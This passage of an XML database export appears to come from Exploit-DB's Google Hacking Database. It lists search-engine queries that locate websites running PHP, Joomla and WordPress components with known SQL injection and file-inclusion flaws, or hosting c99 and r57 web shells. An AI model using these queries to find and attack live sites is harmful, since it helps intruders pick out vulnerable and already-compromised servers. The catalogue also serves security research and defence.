<shortDescription>inurl:&quot;/wp-content/uploads/levoslideshow/&quot;</shortDescription>
<textualDescription>Webshell Upload.
Wordpress Levo-Slideshow 2.3
inurl:&quot;/wp-content/uploads/levoslideshow/&quot;
Decoy</textualDescription>
<query>inurl:&quot;/wp-content/uploads/levoslideshow/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/uploads/levoslideshow/&quot;</querystring>
<edb></edb>
<date>2016-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3615</id>
<link>https://www.exploit-db.com/ghdb/3615</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;?act=phpinfo&quot;</shortDescription>
<textualDescription>Match some well known phpshells (c99 and ironwarez and the like).</textualDescription>
<query>inurl:&quot;?act=phpinfo&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22?act=phpinfo%22</querystring>
<edb></edb>
<date>2010-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3614</id>
<link>https://www.exploit-db.com/ghdb/3614</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;?delete&quot; +intext:&quot;PHP version&quot; +intext:&quot;Safe_mode&quot;</shortDescription>
<textualDescription>Matches some well known phpshells (r57 and the like).</textualDescription>
<query>inurl:&quot;?delete&quot; +intext:&quot;PHP version&quot; +intext:&quot;Safe_mode&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22?delete%22%20+intext:%22PHP%20version%22%20+intext:%22Safe_mode%22</querystring>
<edb></edb>
<date>2010-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3320</id>
<link>https://www.exploit-db.com/ghdb/3320</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;?option=com_bsadv&quot; </shortDescription>
<textualDescription>Joomla Boy Scout Advancement 0.3 (id) SQL Injection - CVE: 2009-2290: https://www.exploit-db.com/exploits/8779</textualDescription>
<query>inurl:&quot;?option=com_bsadv&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22%3Foption%3Dcom_bsadv%22</querystring>
<edb>https://www.exploit-db.com/exploits/8779</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3164</id>
<link>https://www.exploit-db.com/ghdb/3164</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;?page=duyurular_detay&amp;id=&quot;</shortDescription>
<textualDescription>Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-4068: https://www.exploit-db.com/exploits/4224</textualDescription>
<query>inurl:&quot;?page=duyurular_detay&amp;id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22%3Fpage%3Dduyurular_detay%26id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/4224</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1662</id>
<link>https://www.exploit-db.com/ghdb/1662</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;?pageNum_RSnews&quot;&amp;view</shortDescription>
<textualDescription>NUs Newssystem v1.02 (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11674</textualDescription>
<query>inurl:&quot;?pageNum_RSnews&quot;&amp;view</query>
<querystring>https://www.google.com/search?q=inurl:%22%3FpageNum_RSnews%22%26view</querystring>
<edb>https://www.exploit-db.com/exploits/11674</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2977</id>
<link>https://www.exploit-db.com/ghdb/2977</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;?pilih=forum&quot;</shortDescription>
<textualDescription>AuraCMS [Forum Module] Remote SQL Injection Vulnerability - CVE: 2007-4171: https://www.exploit-db.com/exploits/4254</textualDescription>
<query>inurl:&quot;?pilih=forum&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22%3Fpilih%3Dforum%22</querystring>
<edb>https://www.exploit-db.com/exploits/4254</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3680</id>
<link>https://www.exploit-db.com/ghdb/3680</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;ab_fct.php?fct=&quot;</shortDescription>
<textualDescription>Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16044</textualDescription>
<query>inurl:&quot;ab_fct.php?fct=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ab_fct.php?fct=&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/16044</edb>
<date>2011-01-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2016</id>
<link>https://www.exploit-db.com/ghdb/2016</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;add_soft.php&quot;</shortDescription>
<textualDescription>Software Index 1.1 (cid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5378</textualDescription>
<query>inurl:&quot;add_soft.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22add_soft.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/5378</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2955</id>
<link>https://www.exploit-db.com/ghdb/2955</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;article.download.php&quot;</shortDescription>
<textualDescription>Star Articles 6.0 Remote Blind SQL Injection Vulnerability - CVE: 2008-7075: https://www.exploit-db.com/exploits/7240</textualDescription>
<query>inurl:&quot;article.download.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22article.download.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/7240</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2957</id>
<link>https://www.exploit-db.com/ghdb/2957</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;article.download.php&quot;</shortDescription>
<textualDescription>Star Articles 6.0 Remote Blind SQL Injection - CVE: 2008-7075: https://www.exploit-db.com/exploits/7243</textualDescription>
<query>inurl:&quot;article.download.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22article.download.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/7243</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1916</id>
<link>https://www.exploit-db.com/ghdb/1916</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;articles.php?topic=&quot;</shortDescription>
<textualDescription>jPORTAL 2.3.1 articles.php Remote SQL Injection Vulnerability - CVE: 2007-5973: https://www.exploit-db.com/exploits/4614</textualDescription>
<query>inurl:&quot;articles.php?topic=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22articles.php%3Ftopic%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/4614</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2092</id>
<link>https://www.exploit-db.com/ghdb/2092</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;browse.php?folder=&quot; Powered by GeneShop 5</shortDescription>
<textualDescription>GeneShop 5.1.1 SQL Injection Vunerability: https://www.exploit-db.com/exploits/12442</textualDescription>
<query>inurl:&quot;browse.php?folder=&quot; Powered by GeneShop 5</query>
<querystring>https://www.google.com/search?q=inurl:%22browse.php%3Ffolder%3D%22+Powered+by+GeneShop+5</querystring>
<edb>https://www.exploit-db.com/exploits/12442</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2242</id>
<link>https://www.exploit-db.com/ghdb/2242</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;browsecats.php?cid=&quot;</shortDescription>
<textualDescription>SoftBizScripts Hosting Script SQL Injection Vunerability - CVE: 2005-3817: https://www.exploit-db.com/exploits/12439</textualDescription>
<query>inurl:&quot;browsecats.php?cid=&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22browsecats.php%3Fcid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12439</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3189</id>
<link>https://www.exploit-db.com/ghdb/3189</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;cal_day.php?op=day&amp;catview=&quot;</shortDescription>
<textualDescription>Calendarix v0.8.20071118 SQL Injection: https://www.exploit-db.com/exploits/11443</textualDescription>
<query>inurl:&quot;cal_day.php?op=day&amp;catview=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22cal_day.php%3Fop%3Dday%26catview%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/11443</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2804</id>
<link>https://www.exploit-db.com/ghdb/2804</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;cameralife/index.php&quot;</shortDescription>
<textualDescription>Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6087: https://www.exploit-db.com/exploits/6710</textualDescription>
<query>inurl:&quot;cameralife/index.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22cameralife/index.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/6710</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2287</id>
<link>https://www.exploit-db.com/ghdb/2287</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;catalog/product/detail.php?cat=&quot;</shortDescription>
<textualDescription>Webthaiapp detail.php(cat) Blind Sql injection Vulnerability: https://www.exploit-db.com/exploits/12467</textualDescription>
<query>inurl:&quot;catalog/product/detail.php?cat=&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22catalog/product/detail.php%3Fcat%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12467</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1921</id>
<link>https://www.exploit-db.com/ghdb/1921</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;char.php?id=&quot; OR intitle:Minimanager for trinity server</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/12554/</textualDescription>
<query>inurl:&quot;char.php?id=&quot; OR intitle:Minimanager for trinity server</query>
<querystring>https://www.google.com/search?q=inurl:%22char.php%3Fid%3D%22+OR+intitle:Minimanager+for+trinity+server</querystring>
<edb>https://www.exploit-db.com/exploits/12554</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3177</id>
<link>https://www.exploit-db.com/ghdb/3177</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;CIHUY&quot;</shortDescription>
<textualDescription>Joomla Component (com_joomdle) SQL Injection Vulnerability - CVE: 2010-2908: https://www.exploit-db.com/exploits/14466</textualDescription>
<query>inurl:&quot;CIHUY&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22CIHUY%22</querystring>
<edb>https://www.exploit-db.com/exploits/14466</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2414</id>
<link>https://www.exploit-db.com/ghdb/2414</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;classifide_ad.php&quot;</shortDescription>
<textualDescription>AJ Auction 6.2.1 (classifide_ad.php) SQL Injection Vulnerability - CVE: 2008-5212: https://www.exploit-db.com/exploits/5591</textualDescription>
<query>inurl:&quot;classifide_ad.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22classifide_ad.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/5591</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2189</id>
<link>https://www.exploit-db.com/ghdb/2189</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;classifieds.php?cat=&quot;</shortDescription>
<textualDescription>BM Classifieds Ads SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10314</textualDescription>
<query>inurl:&quot;classifieds.php?cat=&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22classifieds.php%3Fcat%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10314</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1917</id>
<link>https://www.exploit-db.com/ghdb/1917</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;classifieds.php?op=detail_adverts&quot;</shortDescription>
<textualDescription>PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability - CVE: 2008-5197: https://www.exploit-db.com/exploits/5961</textualDescription>
<query>inurl:&quot;classifieds.php?op=detail_adverts&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22classifieds.php%3Fop%3Ddetail_adverts%22</querystring>
<edb>https://www.exploit-db.com/exploits/5961</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2226</id>
<link>https://www.exploit-db.com/ghdb/2226</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;click.php?hostid=&quot;</shortDescription>
<textualDescription>Adult Banner Exchange Website (targetid) SQL Injection Vulnerability - CVE: 2008-6101: https://www.exploit-db.com/exploits/6909</textualDescription>
<query>inurl:&quot;click.php?hostid=&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22click.php%3Fhostid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6909</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3724</id>
<link>https://www.exploit-db.com/ghdb/3724</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;clsUploadtest.asp&quot;</shortDescription>
<textualDescription>Submitter: KDGCrew
http://www.site.com/clsUpload/clsUploadtest.asp
http://www.site.com/clsUpload/nameshell.php</textualDescription>
<query>inurl:&quot;clsUploadtest.asp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;clsUploadtest.asp&quot;</querystring>
<edb></edb>
<date>2011-06-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>528</id>
<link>https://www.exploit-db.com/ghdb/528</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;comment.php?serendipity&quot;</shortDescription>
<textualDescription>serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.For an attacker it is possible to inject SQL commands.http://www.securityfocus.com/bid/11269/discussion/</textualDescription>
<query>inurl:&quot;comment.php?serendipity&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22comment.php%3Fserendipity%22</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>2741</id>
<link>https://www.exploit-db.com/ghdb/2741</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_a6mambocredits&quot;</shortDescription>
<textualDescription>Mambo a6mambocredits Component 1.0.0 File Include Vulnerability - CVE: 2006-4288: https://www.exploit-db.com/exploits/2207</textualDescription>
<query>inurl:&quot;com_a6mambocredits&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_a6mambocredits%22</querystring>
<edb>https://www.exploit-db.com/exploits/2207</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1969</id>
<link>https://www.exploit-db.com/ghdb/1969</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_acprojects&quot;</shortDescription>
<textualDescription>Joomla Component com_acprojects Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11480</textualDescription>
<query>inurl:&quot;com_acprojects&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_acprojects%22</querystring>
<edb>https://www.exploit-db.com/exploits/11480</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1964</id>
<link>https://www.exploit-db.com/ghdb/1964</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_acstartseite&quot;</shortDescription>
<textualDescription>Joomla Component com_acstartseite Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11479</textualDescription>
<query>inurl:&quot;com_acstartseite&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_acstartseite%22</querystring>
<edb>https://www.exploit-db.com/exploits/11479</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1970</id>
<link>https://www.exploit-db.com/ghdb/1970</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_acteammember&quot;</shortDescription>
<textualDescription>Joomla Component com_acteammember SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11483</textualDescription>
<query>inurl:&quot;com_acteammember&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_acteammember%22</querystring>
<edb>https://www.exploit-db.com/exploits/11483</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3158</id>
<link>https://www.exploit-db.com/ghdb/3158</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ajaxchat&quot;</shortDescription>
<textualDescription>Joomla Ajax Chat 1.0 remote file inclusion - CVE: 2009-3822: https://www.exploit-db.com/exploits/9888</textualDescription>
<query>inurl:&quot;com_ajaxchat&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ajaxchat%22</querystring>
<edb>https://www.exploit-db.com/exploits/9888</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2917</id>
<link>https://www.exploit-db.com/ghdb/2917</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_artlinks&quot;</shortDescription>
<textualDescription>Joomla Artlinks Component 1.0b4 Remote Include Vulnerability - CVE: 2006-3949: https://www.exploit-db.com/exploits/2209</textualDescription>
<query>inurl:&quot;com_artlinks&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22com_artlinks%22</querystring>
<edb>https://www.exploit-db.com/exploits/2209</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1626</id>
<link>https://www.exploit-db.com/ghdb/1626</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_avosbillets&quot;</shortDescription>
<textualDescription>Joomla (com_avosbillets) SQL injection Vulnerability: https://www.exploit-db.com/exploits/11223</textualDescription>
<query>inurl:&quot;com_avosbillets&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_avosbillets%22</querystring>
<edb>https://www.exploit-db.com/exploits/11223</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2296</id>
<link>https://www.exploit-db.com/ghdb/2296</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_beamospetition&quot;</shortDescription>
<textualDescription>Joomla Component (com_beamospetition) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14502</textualDescription>
<query>inurl:&quot;com_beamospetition&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22com_beamospetition%22</querystring>
<edb>https://www.exploit-db.com/exploits/14502</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1551</id>
<link>https://www.exploit-db.com/ghdb/1551</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_bfsurvey&quot;</shortDescription>
<textualDescription>Joomla Component com_bfsurvey LFI Vulnerability - CVE: 2010-2259: https://www.exploit-db.com/exploits/10946</textualDescription>
<query>inurl:&quot;com_bfsurvey&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_bfsurvey%22</querystring>
<edb>https://www.exploit-db.com/exploits/10946</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1525</id>
<link>https://www.exploit-db.com/ghdb/1525</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_biblestudy&quot;</shortDescription>
<textualDescription>Joomla Component com_biblestudy LFI Vulnerability - CVE: 2010-0157: https://www.exploit-db.com/exploits/10943</textualDescription>
<query>inurl:&quot;com_biblestudy&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_biblestudy%22</querystring>
<edb>https://www.exploit-db.com/exploits/10943</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1592</id>
<link>https://www.exploit-db.com/ghdb/1592</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_biographies&quot;</shortDescription>
<textualDescription>Joomla Component com_biographies SQL injection Vulnerability: https://www.exploit-db.com/exploits/11226</textualDescription>
<query>inurl:&quot;com_biographies&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_biographies%22</querystring>
<edb>https://www.exploit-db.com/exploits/11226</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2245</id>
<link>https://www.exploit-db.com/ghdb/2245</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_book&quot;</shortDescription>
<textualDescription>Joomla Component com_book SQL injection Vulnerability: https://www.exploit-db.com/exploits/11213</textualDescription>
<query>inurl:&quot;com_book&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22com_book%22</querystring>
<edb>https://www.exploit-db.com/exploits/11213</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3245</id>
<link>https://www.exploit-db.com/ghdb/3245</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_booklibrary&quot;</shortDescription>
<textualDescription>Joomla Book Library 1.0 file inclusion - CVE: 2009-3817: https://www.exploit-db.com/exploits/9889</textualDescription>
<query>inurl:&quot;com_booklibrary&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_booklibrary%22</querystring>
<edb>https://www.exploit-db.com/exploits/9889</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1815</id>
<link>https://www.exploit-db.com/ghdb/1815</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_cartweberp&quot;</shortDescription>
<textualDescription>Joomla Component com_cartweberp LFI Vulnerability - CVE: 2010-0982: https://www.exploit-db.com/exploits/10942</textualDescription>
<query>inurl:&quot;com_cartweberp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_cartweberp%22</querystring>
<edb>https://www.exploit-db.com/exploits/10942</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2083</id>
<link>https://www.exploit-db.com/ghdb/2083</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_casino_blackjack&quot;</shortDescription>
<textualDescription>Joomla Casino 0.3.1 Multiple SQL Injection - CVE: 2009-2239: https://www.exploit-db.com/exploits/8743</textualDescription>
<query>inurl:&quot;com_casino_blackjack&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_casino_blackjack%22</querystring>
<edb>https://www.exploit-db.com/exploits/8743</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2712</id>
<link>https://www.exploit-db.com/ghdb/2712</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_category&quot;</shortDescription>
<textualDescription>Joomla Component com_category (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9126</textualDescription>
<query>inurl:&quot;com_category&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_category%22</querystring>
<edb>https://www.exploit-db.com/exploits/9126</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2015</id>
<link>https://www.exploit-db.com/ghdb/2015</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ccnewsletter&quot;</shortDescription>
<textualDescription>Joomla Component com_ccnewsletter LFI Vulnerability - CVE: 2010-0467: https://www.exploit-db.com/exploits/11282</textualDescription>
<query>inurl:&quot;com_ccnewsletter&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ccnewsletter%22</querystring>
<edb>https://www.exploit-db.com/exploits/11282</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2011</id>
<link>https://www.exploit-db.com/ghdb/2011</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ckforms&quot;</shortDescription>
<textualDescription>Joomla Component (com_ckforms) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/15453</textualDescription>
<query>inurl:&quot;com_ckforms&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ckforms%22</querystring>
<edb>https://www.exploit-db.com/exploits/15453</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2039</id>
<link>https://www.exploit-db.com/ghdb/2039</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ckforms&quot;</shortDescription>
<textualDescription>Joomla Component com_ckforms Multiple Vulnerabilities - CVE: 2010-1344: https://www.exploit-db.com/exploits/11785</textualDescription>
<query>inurl:&quot;com_ckforms&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ckforms%22</querystring>
<edb>https://www.exploit-db.com/exploits/11785</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1584</id>
<link>https://www.exploit-db.com/ghdb/1584</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_clan&quot;</shortDescription>
<textualDescription>Joomla Component (com_clan) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15454</textualDescription>
<query>inurl:&quot;com_clan&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_clan%22</querystring>
<edb>https://www.exploit-db.com/exploits/15454</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1581</id>
<link>https://www.exploit-db.com/ghdb/1581</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_dailymeals&quot;</shortDescription>
<textualDescription>Joomla Component com_dailymeals LFI Vulnerability: https://www.exploit-db.com/exploits/10928</textualDescription>
<query>inurl:&quot;com_dailymeals&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_dailymeals%22</querystring>
<edb>https://www.exploit-db.com/exploits/10928</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1526</id>
<link>https://www.exploit-db.com/ghdb/1526</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_dashboard&quot;</shortDescription>
<textualDescription>Joomla Component com_dashboard Directory Traversal: https://www.exploit-db.com/exploits/11086</textualDescription>
<query>inurl:&quot;com_dashboard&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_dashboard%22</querystring>
<edb>https://www.exploit-db.com/exploits/11086</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3038</id>
<link>https://www.exploit-db.com/ghdb/3038</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_dateconverter&quot;</shortDescription>
<textualDescription>Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14154</textualDescription>
<query>inurl:&quot;com_dateconverter&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_dateconverter%22</querystring>
<edb>https://www.exploit-db.com/exploits/14154</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2816</id>
<link>https://www.exploit-db.com/ghdb/2816</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_dbquery&quot; OR &quot;index.php?option=com_dbquery&quot;</shortDescription>
<textualDescription>Joomla Component DBQuery 1.4.1.1 RFI Vulnerability - CVE: 2008-6841: https://www.exploit-db.com/exploits/6003/</textualDescription>
<query>inurl:&quot;com_dbquery&quot; OR &quot;index.php?option=com_dbquery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_dbquery%22+OR+%22index.php%3Foption%3Dcom_dbquery%22</querystring>
<edb>https://www.exploit-db.com/exploits/6003</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3203</id>
<link>https://www.exploit-db.com/ghdb/3203</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_digifolio&quot;</shortDescription>
<textualDescription>Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability - CVE: 2009-3193: https://www.exploit-db.com/exploits/9534</textualDescription>
<query>inurl:&quot;com_digifolio&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_digifolio%22</querystring>
<edb>https://www.exploit-db.com/exploits/9534</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3044</id>
<link>https://www.exploit-db.com/ghdb/3044</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_dms&quot;</shortDescription>
<textualDescription>Joomla Component com_dms SQL Injection Vulnerability - CVE: 2010-0800: https://www.exploit-db.com/exploits/11289</textualDescription>
<query>inurl:&quot;com_dms&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_dms%22</querystring>
<edb>https://www.exploit-db.com/exploits/11289</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2369</id>
<link>https://www.exploit-db.com/ghdb/2369</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_equipment&quot;</shortDescription>
<textualDescription>Joomla Component (com_equipment) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14655</textualDescription>
<query>inurl:&quot;com_equipment&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_equipment%22</querystring>
<edb>https://www.exploit-db.com/exploits/14655</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2323</id>
<link>https://www.exploit-db.com/ghdb/2323</link>
<category>Advisories and Vulnerabilities</category>
